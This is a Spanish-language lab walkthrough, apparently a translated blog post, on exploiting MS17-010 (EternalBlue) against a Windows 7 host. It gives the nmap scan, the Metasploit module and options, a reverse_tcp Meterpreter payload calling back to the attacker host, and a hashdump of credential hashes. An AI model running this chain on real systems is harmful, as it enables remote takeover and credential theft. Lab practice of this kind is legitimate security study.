Desbordamiento remoto MS17-010 (CVE-2017-0143)

Introducción a la vulnerabilidad

La vulnerabilidad MS17-010 aparece en la función de modo kernel srv! SrvOs2FeaListToNt en Windows SMB v1 cuando se procesa la conversión FEA (File Extended Attributes) y hay un desbordamiento de búfer en el grupo de kernel grande no paginado.
Se llamará a la función srv! SrvOs2FeaListToNt antes de convertir la lista FEA en lista NTFEA (Windows NT FEA). srv! SrvOs2FeaListSizeToNt para calcular el tamaño del lsit FEA convertido, el tamaño del cálculo es incorrecto, lo que provoca un desbordamiento del búfer.

entorno de laboratorio

Aquí uso el campo de tiro de Anjie.com

hora 192.168.0.3
Windows7 192.168.0.2

Explotar

Abra nmap para escanear la máquina de destino

nmap  -sV -Pn 192.168.0.2

La máquina de destino ha abierto puertos como 135, 139, 445 y el sistema es win7.
Luego abrimos msf

msfconsole

Abra el cliente de línea de comandos de metasploite y use el comando de búsqueda para encontrar los módulos relacionados de las vulnerabilidades ms17-010

search ms17-010

Dado que esta es la ubicación de destino, podemos usarla directamente

use exploit/windows/smb/ms17_010_eternalblue

Ver la información de configuración y establecer los atributos marcados como sí

show options

Establecer la dirección IP de la máquina de destino

set RHOSTS 192.168.0.2

Después de eso, seleccione la carga útil, que es shellcode, aquí elegimos conectarnos de nuevo a la carga útil del shell de la consola

set payload  windows/x64/meterpreter/reverse_tcp

De manera similar, la carga también debe configurarse, mostrar opciones ver información de
configuración Falta el host local LHOST, configúrelo

set LHOST 192.168.0.3

Después de completar la configuración, ejecute el exploit o ejecute para comenzar a ejecutar el módulo de exploit

run

Obtenga con éxito la sesión de sesión del host de destino

Hemos obtenido con éxito la sesión de sesión. Esta vez continuaremos introduciendo otras funciones del módulo de penetración después de meterpreter.
Ejecute sysinfo para ver información relevante de la máquina de destino.

sysinfo

Ejecutar el comando de ayuda puede ayudarnos a comprender qué funciones tiene meterpreter

help

A continuación, obtenemos el valor hash de la máquina objetivo y
ejecutamos hashdump

hashdump

para resumir

¡Otro día sencillo y satisfactorio!

Supongo que te gusta

Origin blog.csdn.net/p_utao/article/details/108394587
Recomendado
Clasificación